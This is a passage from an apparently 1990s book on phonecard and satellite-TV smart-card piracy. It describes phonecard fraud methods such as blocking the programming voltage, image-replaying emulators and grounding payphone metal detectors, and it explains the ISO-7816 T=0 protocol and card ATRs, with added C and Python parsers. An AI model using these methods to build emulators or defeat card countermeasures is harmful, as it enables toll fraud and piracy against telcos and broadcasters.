PIC16C84 would only retail for £20. It also required a different PCB than a 
standard pirate satellite television card. It was not economically viable. 
Besides most hackers are intent on hacking satellite channels rather than 
hacking the phone system. It is perhaps safer. The incidents do however 
illustrate the depths to which those associated with the channel's anti-piracy 
programs will sink to. You almost get the image of these guys trying to pin 
the JFK assassination on a hacker. 


The Security Of Memory Cards 


Perhaps it might be better to label this section "The Insecurity Of Memory 
Cards". Most of the hacks on memory cards are aimed at phonecards or 
stored value cards. In terms of security, the phonecards are abysmal. Since 
they are serial EPROMs, a number of hacks are possible. 


The 256 bits on the EPROM are arranged in 4 bit wide areas. The first 96 
bits are the manufacturer and issuer codes. These bits identify the telecom 
company and the country of use. 


The other 160 bits are used to indicate the card value and the number of 
available credits. It is not possible to reprogram these cards to give higher 
values. 


One of the earliest was the Infinite Lives hack. Since the EPROM required 
21 to 23 Volts for a successful write operation, the write voltage was 
stopped from getting to the write pad on the smart card. A number of 
materials were used ranging from insulating tape to nail varnish. 


It was easy for the telcos to ECM this hack. It was simply a case of changing 
the program in the telephone so that it checked that the card was writable. 
In logistical terms it would have been nightmarish as each telephone would 
have had to have its EPROM changed. 
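The 256-bit memory map described above and the telco's "check that the card is writable" countermeasure, worked through in C as an added example that is not code from the book or from any telco: a constructed 50-unit card image is parsed for credits used and remaining, and the payphone's deduct routine burns the next token bit and reads it back, refusing a card whose Vpp pad has been insulated. The bit order within a byte, the issuer byte values and all function names are my own assumptions.

```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

#define CARD_BITS        256
#define CARD_BYTES       (CARD_BITS / 8)
#define ISSUER_AREA_BITS 96   /* bits 0..95: manufacturer/issuer area, fuse protected */

/* Constructed model of a phonecard: the 256-bit image plus a flag standing in
 * for the Vpp pad being insulated, so that write operations silently fail. */
typedef struct {
    uint8_t image[CARD_BYTES];
    bool    vpp_blocked;
} phonecard_t;

enum { DEDUCT_OK = 0, DEDUCT_EMPTY = 1, DEDUCT_NOT_WRITABLE = 2 };

/* Bit n of the image in serial clock-out order. Assumption: bit 0 is the most
 * significant bit of byte 0; the book does not give the order within a byte. */
static bool card_get_bit(const uint8_t *img, int n) {
    return (img[n / 8] >> (7 - (n % 8))) & 1;
}

/* EPROM semantics: a bit can only be burnt from 0 to 1, never cleared, and
 * nothing happens at all when the programming voltage does not reach the chip. */
static void card_burn_bit(phonecard_t *card, int n) {
    if (card->vpp_blocked) return;
    card->image[n / 8] |= (uint8_t)(1u << (7 - (n % 8)));
}

/* Credits already consumed: the set bits in the token area (bits 96..255). */
int card_credits_used(const uint8_t *img) {
    int used = 0;
    for (int n = ISSUER_AREA_BITS; n < CARD_BITS; n++)
        if (card_get_bit(img, n)) used++;
    return used;
}

/* Credits remaining against the face value held in the issuer area. */
int card_credits_left(const uint8_t *img, int face_value) {
    int left = face_value - card_credits_used(img);
    return left < 0 ? 0 : left;
}

/* The payphone's side of the countermeasure: burn the next unused token bit,
 * then read it back. A card whose Vpp pad has been insulated still shows the
 * bit clear, so the phone can refuse the call instead of giving free credit. */
int phone_deduct_credit(phonecard_t *card, int face_value) {
    if (card_credits_used(card->image) >= face_value) return DEDUCT_EMPTY;
    for (int n = ISSUER_AREA_BITS; n < CARD_BITS; n++) {
        if (card_get_bit(card->image, n)) continue;        /* already used */
        card_burn_bit(card, n);
        return card_get_bit(card->image, n) ? DEDUCT_OK : DEDUCT_NOT_WRITABLE;
    }
    return DEDUCT_EMPTY;                                  /* every token bit burnt */
}

/* Build a constructed 50-unit card image with `used` credits already burnt.
 * The issuer bytes are made-up values, not those of any real card. */
void card_make_image(phonecard_t *card, int used, bool vpp_blocked) {
    memset(card->image, 0, CARD_BYTES);
    card->image[0] = 0xA5;           /* constructed manufacturer identifier */
    card->image[1] = 0x01;           /* constructed application: phone card */
    card->image[2] = 50;             /* credits value */
    card->vpp_blocked = false;       /* personalisation writes must succeed */
    for (int i = 0; i < used; i++) card_burn_bit(card, ISSUER_AREA_BITS + i);
    card->vpp_blocked = vpp_blocked;
}

/* Scenario helpers returning plain ints so each outcome is easy to check. */
int demo_deduct_result(int used, bool vpp_blocked) {
    phonecard_t card;
    card_make_image(&card, used, vpp_blocked);
    return phone_deduct_credit(&card, 50);
}

int demo_credits_used_after_deduct(int used, bool vpp_blocked) {
    phonecard_t card;
    card_make_image(&card, used, vpp_blocked);
    phone_deduct_credit(&card, 50);
    return card_credits_used(card.image);
}

int main(void) {
    phonecard_t card;
    card_make_image(&card, 3, false);
    printf("genuine card: %d used, %d left\n",
           card_credits_used(card.image), card_credits_left(card.image, 50));
    printf("deduct on genuine card -> %d, now %d used\n",
           demo_deduct_result(3, false), demo_credits_used_after_deduct(3, false));
    printf("deduct on Vpp-insulated card -> %d, still %d used\n",
           demo_deduct_result(10, true), demo_credits_used_after_deduct(10, true));
    return 0;
}
```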


The First Phonecard Emulators 


The phonecards are electronically simple devices. As a result they have 
been continuously hacked since their introduction in the early eighties. The 
hacks that prevented the EPROM from being written to were primitive. 
Hackers and phreakers with electronic engineering backgrounds started to 
become interested in the problem. 
The first emulator design was to implement the phonecard using discrete 
circuitry. The design consisted of some clocking circuitry, some addressing 
circuitry and an EPROM. The EPROM contained images of a number of 
phonecards. A switch would select the images by switching between the 
data lines of the EPROM. Since the phonecard is a serial EPROM, there is 
only one data line and the addressing is carried out internally. The emulator 
did much the same thing but with discrete and readily available 
components. 


Thus when this EPROM emulator was inserted in the phone's card slot it 
would appear to be an ordinary phonecard. When all of the card images on 
the EPROM were used it was simply a case of reprogramming the EPROM 
with new ones. It was convenient for people with the access to computers, 
EPROM programmers and UV erasers but it was just not commercially 
viable. Indeed none of the early hacks could be classified as commercially 
viable in the way that pirate satellite television cards are. 


This serial EPROM emulator held the seeds of its own downfall. It was a 
device that was constructed on a PCB that only partially looked like a 
phonecard. There was an extended area of the board that carried the 
circuitry and therefore it was bigger than a phonecard. 


The telephone manufacturers began to include a sliding door on the newer 
versions of the phones. The sliding door would mean that any oversized 
card, such as a serial EPROM emulator, would be too long and the door 
would jam. When the door would not close, the phone would not work. 


Second Generation Emulators 


The second generation of phonecard emulators were more commercially 
orientated than the originals. These new designs were based on 
microcontrollers rather than the discrete EPROMs and CMOS logic. 


Prior to the PIC16C84 model, the commonest microcontrollers were the 
8751 and the 68705. Phonecard emulator programs for these 
microcontrollers were widely available on BBSes associated with the 
phreaking scene. But these devices were still far from commercialised. 


Two methods of loading the phonecard memory image into the emulator 
memory existed. The first was to include the phonecard memory image as 
part of the microcontroller program. This was of course a very limited option 
as it meant that the same phonecard serial number was being used 
repeatedly. 


This kind of phonecard serial number reuse proved very dangerous for 
phreakers. The telcos could build up a pattern of phones where the 
emulators were being used. Then it would be a simple matter to monitor the 
calls from those phones checking the numbers that were dialed by the 
people using the emulators. 


These calls were generally ET calls. The users were typically students at 
college and university and to cut down on the long distance phone charges 
when calling home, they would use the emulators. The ET reference comes 
from the movie where the extraterrestrial utters the phrase "phone home". 
With the current caller identification schemes implemented on some phone 
systems, using emulators to call home is extremely unwise. 


The second method of loading the phonecard image into the emulator's 
memory was to include a card reader slot. This was a particularly elegant 
method and allowed the use of old phonecard serial numbers. This type of 
hack was largely associated with the 68705 version of the emulator. 


The second generation of emulators suffered from implementation 
problems. This meant that they were never a commercial threat. 


Third Generation Emulators 


It could be said that the third generation of phonecard emulators developed 
as a result of the satellite television smart card piracy. The foundation of the 
satellite television smart card piracy in Europe is the PIC16C84 
microcontroller. Emulating a 6805 microcontroller is a difficult task but 
emulating a 256 bit serial EPROM with a microcontroller was not that difficult. 


The result was that there was a barrage of PIC16C84 phonecard emulator 
programs available. The situation was not helped by the fact that the 
PicBuster routine allowed the programs from the phonecard emulators to be 
popped and widely distributed. 


The PIC16C84 version was perhaps the first really commercialised 
phonecard emulator. Apparently some manufacturers in Eastern Europe were 
manufacturing a European phonecard emulator that would work in most 
countries that had phonecards. Piracy, even when applied to telephone 
piracy, is a truly international industry. 


The PCB design for a PIC16C84 phonecard emulator was somewhat 
different to that of the satellite television pirate smart cards. Apart from the 
fact that the Vpp pad was used on the phonecards, the telcos had 
introduced an ECM that was designed to stop the use of phonecard 
emulators. 


The ECM was that the phones now included a metal detector. The official 
phonecard only had metal where the chip was. The rest of the card was just 
plastic. However the phonecard emulators had metal PCB tracks between 
the pads and the circuitry. The metal detector would detect these tracks and 
stop the phone from working. 


Of course the solution to this ECM was simple. A flaw in the design of the 
metal detector was exploited. By grounding the metal detector it stopped 
working. The PCB design of the phonecard emulators was modified to 
include a strip that grounded the metal detector. The strip was built up with 
solder to ensure a good contact to the metal detector probe. These simple 
ECMs were no challenge for hackers and pirates who had worked on 
hacking D2-MAC and VideoCrypt. 


The Present Situation 


Satellite television piracy is more lucrative than phonecard piracy. The result 
is that most of the hackers and pirates tend to ignore this option. Besides it 
is too much of a legal risk. While at the moment, hacking satellite television 
channels is quasi-legal, hacking phonecards is definitely illegal. There is 
also no real challenge any more. Most of the real piracy on phone networks 
occurs on the mobile phones. It is far simpler to clone a mobile phone than it 
is to build a phonecard emulator. 


The ease with which mobile phones can be cloned tends to put the piracy 
on phonecards firmly in second place. Indeed it is not perceived to be much 
of a threat by the telcos. They are far more worried about the mobile phone 
fraud issues. If there is a high incidence of phonecard emulator use on a 
particular phone they can replace that phone with an ordinary payphone. 


This of course does not mean that phonecard piracy does not take place. 
The real reason that it is not a major industry is that it is not as economically 
lucrative as satellite television piracy. Of course in the future, should the 
newer smart cards be too complex to emulate on the PIC16C84s, there is 
the potential for a huge number of chips becoming available for 
incorporation in phonecard emulators. 


The phones have some ECMs that are rather advanced and using an 
unproven device could prove dangerous. This is especially the case where 
the phone, on detecting a pirate card, would trigger an alarm call to the 
exchange. Some of the newer cards do not even use the Vpp voltage. 
Instead they have an on-chip charge pump which multiplies the Vcc supply 
voltage to generate Vpp internally. It is a continuing battle and a dangerous 
one for hackers. The telcos are not satellite channels. They are nastier. 
As was stated previously, the reason that the telcos use the EPROM cards 
is because they are cheap and disposable. There are some newer versions 
appearing on the market and these are EEPROM. 


The main attraction for the telcos is the fact that the technology is both 
cheap and disposable. EEPROM cards however are reusable by nature. Of 
late, most of the high value cards have become increasingly difficult to buy. 
In Ireland, the card values are 10, 20, 50 and 100 units. The 100 unit cards 
are not widely available. It would seem that Telecom Eireann, the local 
telco, has withdrawn them. 


Perhaps a very good reason for limiting the availability of the high value 
cards is that the hacker and phreakers tend to use an image of these high 
value cards. Therefore with the lack of high value cards on the market, it 
would be easier to determine a usage pattern for emulators. 


British Telecom have also introduced phonecards recently. It is not yet 
known what kind of protocol they use. The cards may be using a 
Microwire-like protocol (as per ordinary phonecards) or a different protocol 
modelled on I2C. The cards also apparently have a time limit during which 
the cards are valid. UK phreakers are actively investigating the cards and it 
looks like there will be some hacks on the system in the next few months. 


The telcos in the rest of Europe using this technology have had problems 
with emulators. Some are managing to fight the piracy others are not so 
successful. As regards the systems being pirated on a commercial level, the 
situation is uncertain. 


With the collapse of the D2-MAC market due to internecine piracy rather 
than countermeasures by the channels and the lack of a PIC16C84 based 
hack on the Sky 10 card, a pan-European pirate phonecard is definitely an 
attractive proposition for some pirates. However most pirates would steer 
clear of this kind of product due to the risks involved. 
The ISO-7816 Protocol 


The smart cards used on most scrambling systems use a serial data 
link running at 9600 baud. The exceptions to this are the DirecTv 
system and VideoCrypt-II which initialise the card at 9600 Baud but 
then switch to 38400 Baud for data transmission. All of the data is 
transferred via this link. The ISO-7816 part 3 specification covers the 
card transmission protocols. 


When the card is inserted into the decoder, it is reset and it sends a 
packet of information to the decoder. This packet of information is 
known as the "Answer To Reset". This is perhaps the most important 
packet sent by the card as it tells the decoder what kind of 
communications protocol is to be used and also what signals and 
voltages are necessary for operation. 


The structure of this ATR packet is shown in the diagram. Most of the 
smart cards in operation in Europe use the T=0 protocol. The T=1 
version is a block transmission protocol whereas the T=0 protocol is a 
character transmission protocol. 


The T=0 protocol is asynchronous, half duplex, active low reset and 
uses inverse convention. The term asynchronous means that the 
protocol is serial as opposed to parallel. With parallel transmission, 
some form of clocking signal has to be sent; in an asynchronous 
protocol, there is no separate clocking signal. Half duplex means that it 
is a talk - listen protocol. At any one time the data is flowing in only 
one direction. The inverse convention means that the data has to be 
inverted and the order of the bits has to be reversed to read it with an 
RS232 interface. The format is roughly equivalent to 8 data bits, 1 
parity bit and 2 stop bits on the RS232 interface. 


The T=0 protocol is a character based protocol. Each character is 
composed of ten bits. The first bit is a start bit. The next eight bits are 
the data (a byte) and the last bit is the Even Parity check bit. This bit is 
used for error correction and always ensures that there is an even 
number of ones in the character. 


[Diagram: Character Structure - Start Bit, 8 Bits Of Data, Even Parity 
Check Bit. Z and A are the logic levels.] 
The Answer To Reset Packet Structure 


The Initial Character (TS) 

The Format Character (T0) 

The Interface Characters 
    TA1 - Clock Frequency 
    TB1 - Maximum Programming Current and Voltage 
    TC1 - Additional Guard Time Or Stop Bits Requested 
    TD1 - Subsequent Interface Characters And Protocol 

If the TD1 character is not transmitted in a packet then the protocol is 
assumed to be T=0 and no further interface characters (TA2, TB2, TC2, 
TD2) follow. This is exactly the situation with the official Sky 
(VideoCrypt) cards. They do not transmit a TD1 character but the pirate 
VideoCrypt cards do transmit the TD1 character. 

The Historical Characters (15 max) 

These characters are card specific. They describe the type of card, the 
software issue, the ROM mask, the manufacturer code, the issuer code 
and the period for which the card is valid. 

The Check Character (TCK) 

This character is not transmitted in T=0 only. 


4: Smart Cards & Stupid Mistakes 


The character structure is shown in the diagram. The levels Z and A are 
the logic levels. In the inverse convention (3Fh) the standard logic 
polarity is reversed (Z=0 and A=1). The order of the bits in the data is 
also reversed with the most significant bit being transmitted first. 


[Diagram: TS (3F Inverse Convention) - Start Bit, 8 Bits Of Data sent as 
b8 b7 b6 b5 b4 b3 b2 b1, Even Parity Check Bit. A=1 and Z=0, b8 is the 
msb.] 


In the direct convention (3Bh), the standard logic polarity is used (Z=1 
and A=0). The order of bits is normal with the least significant bit being 
transmitted first. 


[Diagram: TS (3B Direct Convention) - Start Bit, 8 Bits Of Data sent as 
b1 b2 b3 b4 b5 b6 b7 b8, Even Parity Check Bit. Z=1 and A=0, b8 is the 
msb.] 


The error correction mechanism in the T=0 protocol is simple. If the 
parity check fails then a retransmission of that character is requested by 
sending an A level in the guardtime after the parity bit. This causes a 
retransmission of the character. This form of error correction has no 
direct equivalent in RS232. 
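The character framing and parity rule just described, as an added example (not code from the book): it builds the ten line levels of one T=0 character in either convention, decodes them back with the even-parity check, and shows what an ordinary RS232 port, which assumes the direct convention, makes of inverse-convention characters. Line states Z and A are modelled as 1 and 0; `uart_to_inverse` is the invert-then-reverse rule from the text. All values are constructed for illustration.

```python
# Added example (not from the book): framing and decoding of a single T=0
# character in the direct (TS=3Bh) and inverse (TS=3Fh) conventions, with the
# even-parity check and the RS232/UART view described in the text.
#
# Line levels are modelled as integers: 1 = state Z (idle, high), 0 = state A.
# Direct convention:  logic 1 is sent as Z, logic 0 as A, b1 (lsb) first.
# Inverse convention: logic 1 is sent as A, logic 0 as Z, b8 (msb) first.

LEVEL_Z = 1
LEVEL_A = 0


def _parity_bit(value: int) -> int:
    """Even parity: the bit that makes the ones in data + parity an even count."""
    return bin(value & 0xFF).count("1") & 1


def _level(bit: int, inverse: bool) -> int:
    """Map a logic bit to the line level of the chosen convention (and back)."""
    return (bit ^ 1) if inverse else bit


def frame_character(value: int, inverse: bool) -> list:
    """Return the 10 line levels of one character: start, 8 data, parity."""
    bits = [(value >> i) & 1 for i in range(8)]       # b1 .. b8 (lsb first)
    if inverse:
        bits.reverse()                                 # b8 .. b1 (msb first)
    levels = [LEVEL_A]                                 # start bit is always A
    levels += [_level(b, inverse) for b in bits]
    levels.append(_level(_parity_bit(value), inverse))
    return levels


def decode_character(levels: list, inverse: bool):
    """Decode 10 line levels into (value, parity_ok).

    A receiver that gets parity_ok == False pulls the line to A during the
    guard time after the parity bit to ask for the character again; this
    function only supplies that decision.
    """
    if len(levels) != 10 or levels[0] != LEVEL_A:
        raise ValueError("no start bit")
    bits = [_level(lv, inverse) for lv in levels[1:9]]    # back to logic bits
    if inverse:
        bits.reverse()                                    # restore b1..b8 order
    value = sum(b << i for i, b in enumerate(bits))
    parity = _level(levels[9], inverse)
    parity_ok = (bin(value).count("1") + parity) % 2 == 0
    return value, parity_ok


def uart_read(levels: list):
    """What a plain UART (start low, lsb first, even parity) makes of the same
    10 levels: (raw_byte, uart_parity_ok)."""
    raw = sum(lv << i for i, lv in enumerate(levels[1:9]))
    uart_parity_ok = (bin(raw).count("1") + levels[9]) % 2 == 0
    return raw, uart_parity_ok


def uart_to_inverse(raw: int) -> int:
    """Translate a byte captured by a UART into the inverse-convention value:
    invert every bit, then reverse the bit order (the text's two-step rule)."""
    inverted = (~raw) & 0xFF
    return int(f"{inverted:08b}"[::-1], 2)


def inverse_to_uart(value: int) -> int:
    """The opposite direction: the byte a UART must send to put value on the
    line. Invert-then-reverse is its own inverse, so the same function serves."""
    return uart_to_inverse(value)


if __name__ == "__main__":
    ts = frame_character(0x3F, inverse=True)
    print("levels:", ts, "uart sees:", uart_read(ts), "translated:",
          hex(uart_to_inverse(uart_read(ts)[0])))
```

Feeding `frame_character(0x3F, True)` to `uart_read` gives 03h with a parity failure: a serial port reading an inverse-convention card sees the TS character as 03h, and because the eight data bits and the parity bit are all inverted, a UART set up for even parity flags every character. The invert-then-reverse translation turns the 03h back into 3Fh.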





The TS Character 


This is the initial character of the ATR. It is either 3Fh or 3Bh. The 
3Fh means that the inverse convention is used. The 3Bh means that 
the direct convention is used. 


The T0 Character 


This is the format character. This character specifies what interface 
characters and how many historical characters are transmitted. The 
breakdown on this character is shown in the inset box. The high 
nybble determines which interface characters are sent. The low nybble 
determines how many historical characters are sent. 
The Interface Characters 


The TA1 Character 


This character controls the clock selection. The VideoCrypt decoder is 
designed to handle two clock frequencies: 3.5712 and 7.1424 MHz. The 
value for a 3.5712 MHz clock is 11h and for a 7.1424 MHz clock the 
value is 31h. The strange clock frequency has to do with the fact that 
the 9600 baud rate is derived from dividing 3.5712 MHz by 372. 


The TB1 Character 


This character specifies the programming voltage and current required 
by the card. The most significant bit of this character is always zero. 
The next two most significant bits specify the maximum programming 
current factor; in the case of the VideoCrypt ATR these bits are 10b 
and this equates to a factor of 100. The bits b5 to b1 specify the 
programming voltage in volts. Again in the case of the VideoCrypt ATR 
(0101b) the programming voltage is 5 Volts. 


The TC1 Character 


This character specifies how much extra guard time or stop bits to put 
between each character. In the VideoCrypt example, five stop bits are 
requested. The main idea here is to allow the card enough time to 
process each character before the next one arrives. 


The TD1 Character 


In many respects this character is similar to the Format Character. The 
high nybble determines the presence of subsequent interface 
characters. The low nybble specifies the protocol to be used. 


If the TD1 character is not transmitted, as indeed it is not in the official 
Sky cards, then the protocol is assumed to be T=0. 


The T1 - TK Characters 


These are the historical characters. They provide information about the 
card itself. The information in this area generally relates to the version 
of the software, the processor type, the card issuer, the card 
manufacturer and the date of manufacture. 
The TCK Character 


This is a final check character. It is the value necessary to ensure that 
the EXOR sum of all of the characters from T0 to TCK is zero. This 
check character is not transmitted if only the T=0 protocol is in 
operation. 


The T0 Format Character 





Y1 indicates that there are interface bytes to follow. The bitset 
indicates which characters they are. 


b8=1 - TA1 (Clock Frequency) 

b7=1 - TB1 (Maximum Programming Current And Voltage) 

b6=1 - TC1 (Additional Guardtime or Stop Bits Requested) 

b5=1 - TD1 (Subsequent Interface Characters And Protocol) 


The K value indicates the number of historical characters transmitted. 
This is a number between 0 and 15, (0h to Fh). 
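An ATR parser covering the fields above, as an added example (not code from the book; the sample ATRs at the bottom are constructed for the example and are not real card ATRs): it reads TS, splits T0 into Y1 and K, follows the TA/TB/TC/TD chain as each TD high nybble directs, collects the historical characters and checks TCK whenever a protocol other than T=0 is announced. The FI/DI tables that turn TA1 into a clock divider are the ISO 7816-3 values rather than anything on the page; with them 11h at 3.5712 MHz and 31h at 7.1424 MHz both come out at 9600 baud, as the text says. TB1 is split exactly as the text describes (b7/b6 as the current code, b5..b1 as volts) without mapping the current code to a figure.

```python
# Added example (not the book's code): parser for the Answer To Reset fields
# TS, T0 (Y1 and K), TA1/TB1/TC1/TD1 (and any TA2.. that TD1 announces), the
# historical characters and the TCK check character.

# ISO 7816-3 clock-rate conversion (FI -> F) and bit-rate adjustment (DI -> D)
# tables; these are standard values, not taken from the page.
FI_TABLE = {0: 372, 1: 372, 2: 558, 3: 744, 4: 1116, 5: 1488, 6: 1860,
            9: 512, 10: 768, 11: 1024, 12: 1536, 13: 2048}
DI_TABLE = {1: 1, 2: 2, 3: 4, 4: 8, 5: 16, 6: 32, 8: 12, 9: 20}


def parse_atr(atr: bytes) -> dict:
    """Parse an ATR into named fields. Raises ValueError if it is truncated."""
    if len(atr) < 2:
        raise ValueError("ATR needs at least TS and T0")
    ts, t0 = atr[0], atr[1]
    if ts == 0x3F:
        convention = "inverse"
    elif ts == 0x3B:
        convention = "direct"
    else:
        raise ValueError(f"unknown TS {ts:02X}h")

    info = {"convention": convention, "interface": {}, "protocols": []}
    info["historical_count"] = t0 & 0x0F            # K: 0h..Fh
    y = t0 >> 4                                    # Y1: which of TA1..TD1 follow
    pos, level = 2, 1
    while True:                                    # TDi's high nybble is Y(i+1)
        for mask, name in ((1, "TA"), (2, "TB"), (4, "TC"), (8, "TD")):
            if y & mask:
                if pos >= len(atr):
                    raise ValueError(f"ATR truncated at {name}{level}")
                info["interface"][f"{name}{level}"] = atr[pos]
                pos += 1
        td = info["interface"].get(f"TD{level}")
        if td is None:
            break
        info["protocols"].append(td & 0x0F)        # low nybble: protocol
        y = td >> 4
        level += 1
    if not info["protocols"]:
        info["protocols"] = [0]                    # no TD1: T=0 is assumed

    k = info["historical_count"]
    if pos + k > len(atr):
        raise ValueError("ATR truncated in the historical characters")
    info["historical"] = atr[pos:pos + k]
    pos += k

    # TCK is only sent when something other than T=0 is indicated; it makes
    # the EXOR of every character from T0 to TCK inclusive equal to zero.
    info["tck_present"] = any(p != 0 for p in info["protocols"])
    if info["tck_present"]:
        if pos >= len(atr):
            raise ValueError("ATR truncated before TCK")
        xor = 0
        for b in atr[1:pos + 1]:
            xor ^= b
        info["tck_ok"] = xor == 0
        pos += 1
    info["trailing"] = atr[pos:]                   # anything left over is suspect

    ta1 = info["interface"].get("TA1")
    if ta1 is not None:
        info["F"] = FI_TABLE.get(ta1 >> 4)
        info["D"] = DI_TABLE.get(ta1 & 0x0F)
    tb1 = info["interface"].get("TB1")
    if tb1 is not None:
        info["prog_current_code"] = (tb1 >> 5) & 0x03   # b7,b6 as in the text
        info["prog_voltage_v"] = tb1 & 0x1F             # b5..b1, in volts
    tc1 = info["interface"].get("TC1")
    if tc1 is not None:
        info["extra_guard_time"] = tc1                  # extra stop bits asked for
    return info


def baud_for_clock(info: dict, clock_hz: int) -> float:
    """Bit rate implied by TA1 for a given card clock: clock / F * D."""
    return clock_hz * info["D"] / info["F"]


def compute_tck(atr_without_tck: bytes) -> int:
    """Check character for an ATR: EXOR of T0 through the last historical byte."""
    xor = 0
    for b in atr_without_tck[1:]:
        xor ^= b
    return xor


# Constructed sample ATRs (not real card ATRs). The first has the shape the
# text gives for an official VideoCrypt card: inverse convention, TA1/TB1/TC1
# present, no TD1, 14 historical characters and therefore no TCK.
SAMPLE_T0_ATR = bytes([0x3F, 0x7E, 0x11, 0x25, 0x05]) + bytes(range(0xA0, 0xAE))
# The second announces T=1 in TD1, so a TCK must follow the historical bytes.
SAMPLE_T1_ATR_BODY = bytes([0x3B, 0xF2, 0x11, 0x25, 0x05, 0x01, 0xAA, 0xBB])
SAMPLE_T1_ATR = SAMPLE_T1_ATR_BODY + bytes([compute_tck(SAMPLE_T1_ATR_BODY)])

if __name__ == "__main__":
    for atr in (SAMPLE_T0_ATR, SAMPLE_T1_ATR):
        print(atr.hex(" ").upper(), parse_atr(atr))
```

The parser refuses truncated ATRs rather than guessing, and reports any bytes left after the last expected character in `trailing`, which is the cheapest check a decoder can make before looking at the historical characters at all.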


Examples of the Answers To Reset from a number of different cards 
are given. The examples are those of an official Sky 07 card, an 
official Sky 09 card and a pirate 07 card. The first two are Sky cards 
and the last one is a pirate card. There are a number of characters 
that identify the Sky cards as being actual Sky cards. There are also 
some indicators that the actual card issue number and the month of 
issue are also included. 


The actual function of some of the characters is not known - yet. It 
does however appear that there is a manufacturer's identifier and batch 
number in addition to a microcontroller identifier. 
[Table: Answer To Reset examples, one column each for the Sky Card 
Issue 09, the Sky Card Issue 07 and the Pirate Issue 07 card. The scan 
is only partly legible; the values that can be read, with the column 
alignment lost, are 3F 3F, 7E FA, 11 11, 25 25, 05, 00, 01, B0, 02, 3B, 
34, 4D, 59, 00, 81, 80.] 


The Sky cards do not send a TD1 character but the pirate card does. 


The most important historical characters are the 4D 59 ones. The 
VideoCrypt decoder checks each card inserted to see if these bytes are 
present in the historical characters area at that particular position. If 
these characters are not found in these positions, the card is rejected. 
These appear to be the VideoCrypt identifiers. Perhaps they are partial 
initials of the designers. 


The B0 byte is not apparently essential though it does appear in all 
cards. This could be the microcontroller identifier that identifies the 
smart card (official) as a 6805 type. 


The 53 4B characters may well be the identifiers for Motorola as in 
ASCII they are SK. Of course it is not clear what other characters 
identify the actual ROM Mask issue or indeed the program. Perhaps the 
characters before the VideoCrypt identifier are those to do with News 
Datacom's internal program identification. 

The most obvious, if not a coincidence, are the two last characters 
of the official Sky cards. They identify the card issue as being 07 and 
09 respectively. The last character may be an integer value as the 09 
was a continuing subscription card. The subscription was taken in 
August 1993. 
In the T=0 protocol, the decoder can send commands to the card. 
These commands are followed by a data transmission to or from the 
card. As the protocol is a character based protocol the card has some 
limited flow control capabilities. In addition to these capabilities the card 
can have the decoder turn on or off the programming voltage. This is 
achieved by using the Procedure Byte. 


The decoder will send a five byte header to the card to initiate a 
command. The structure of the header is shown below. 


Header Structure:   CLA | INS | P1 | P2 | P3 


The CLA is the class. For VideoCrypt this is always 53. INS is the 
instruction. This is the command instruction to be initiated. The P1 and 
P2 bytes are not used in VideoCrypt but are used in EuroCrypt. The 
P3 byte signals the length of the data. 





Procedure Byte 

ACK    INS              Send (Do not turn on Vpp) 
       INS + 1          Send (Turn on Vpp) 
       NOT (INS)        Send Byte (Do not turn on Vpp) 
       NOT (INS + 1)    Send Byte (Turn on Vpp) 
NULL   60h              Wait 
SW1    SW1              End Of Transfer - wait for SW2 





After sending this header, the decoder then waits for the Procedure 
Byte. There are a number of types of procedure bytes. The main one is 
the Acknowledge or ACK byte. This tells the decoder how to proceed 
as regards transferring data and controlling the programming voltage. 


The NULL byte signals that the decoder should wait for a new 
procedure byte. The status word bytes SW1 and SW2 transmit the 
card's status after the end of the command. The SW1 byte is used 
when there is a significant error. The SW1 error conditions are as 
follows. 
6E    Instruction class not supported 
6D    Unknown Instruction 
6B    Incorrect address or reference 
67    Incorrect length 
6F    Unknown and it's wrong anyway! 

A normal command termination is represented by 90 00. 


Decoder   53 78 00 00 08 
Card      78 
Card      53 4B 59 20 48 41 43 4B 
Card      90 00 


The diagram above is an example of the card - decoder traffic. The 
decoder sends the card a header requesting the eight byte decrypt 
key. The instruction for this command is 78h. The card acknowledges 
with the procedure byte 78h, returns the eight data bytes and ends with 
the status word 90 00. 


On many of the early card traffic monitoring programs this transaction 
would appear as the following. 


53 78 00 00 08 78 53 4B 59 20 48 41 43 4B 90 00 


A basic communications program would show up a similar block 
structure but a translation table would have to be entered to produce 
the proper results. 
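The exchange above, decoded by an added example (not code from the book) of the translation an early monitor program had to apply: it takes the flat byte log, peels off the five-byte header, interprets each procedure byte (the four ACK forms, NULL and SW1), collects the data bytes and names the SW1 condition from the table above. The direction of the data is a parameter, because a passive monitor cannot tell it from the bytes alone; for 78h the text says the key comes from the card, which is the default. The second sample log is constructed to exercise NULL and the single-byte ACK forms.

```python
# Added example (not the book's code): decode one T=0 command from a flat
# decoder<->card byte log into header, procedure bytes, data and status word.

SW1_TEXT = {                       # the SW1 conditions listed in the text
    0x90: "Normal termination",
    0x6E: "Instruction class not supported",
    0x6D: "Unknown instruction",
    0x6B: "Incorrect address or reference",
    0x67: "Incorrect length",
    0x6F: "Unknown, and it's wrong anyway",
}
VIDEOCRYPT_CLA = 0x53              # the CLA the text gives for VideoCrypt
NULL_BYTE = 0x60


def parse_t0_exchange(log: bytes, data_from_card: bool = True) -> dict:
    """Walk one command in a flat log. Returns the header fields, a list of
    (who, bytes, note) events, the data moved, the Vpp request and the SW."""
    if len(log) < 5:
        raise ValueError("log shorter than a command header")
    cla, ins, p1, p2, p3 = log[:5]
    who_data = "card" if data_from_card else "decoder"
    out = {"cla": cla, "ins": ins, "p1": p1, "p2": p2, "p3": p3,
           "cla_is_videocrypt": cla == VIDEOCRYPT_CLA,
           "events": [("decoder", bytes(log[:5]), "header")],
           "data": bytearray(), "vpp_requested": False, "sw": None}
    remaining = p3                 # bytes still to move (P3 = 0 not special-cased)
    pos = 5
    while pos < len(log):
        pb = log[pos]
        pos += 1
        if pb == NULL_BYTE:                                   # NULL: keep waiting
            out["events"].append(("card", bytes([pb]), "NULL, wait"))
            continue
        if pb in (ins, (ins + 1) & 0xFF):                     # ACK: send all
            count, vpp = remaining, pb != ins
        elif pb in ((~ins) & 0xFF, (~(ins + 1)) & 0xFF):      # ACK: send one byte
            count, vpp = min(1, remaining), pb != (~ins) & 0xFF
        elif (pb & 0xF0) in (0x60, 0x90):                     # SW1, then SW2
            if pos >= len(log):
                raise ValueError("SW1 without SW2")
            sw2 = log[pos]
            pos += 1
            out["sw"] = (pb, sw2)
            out["status"] = SW1_TEXT.get(pb, f"SW1 {pb:02X}h not in table")
            out["events"].append(("card", bytes([pb, sw2]), out["status"]))
            break
        else:
            raise ValueError(f"unexpected procedure byte {pb:02X}h")
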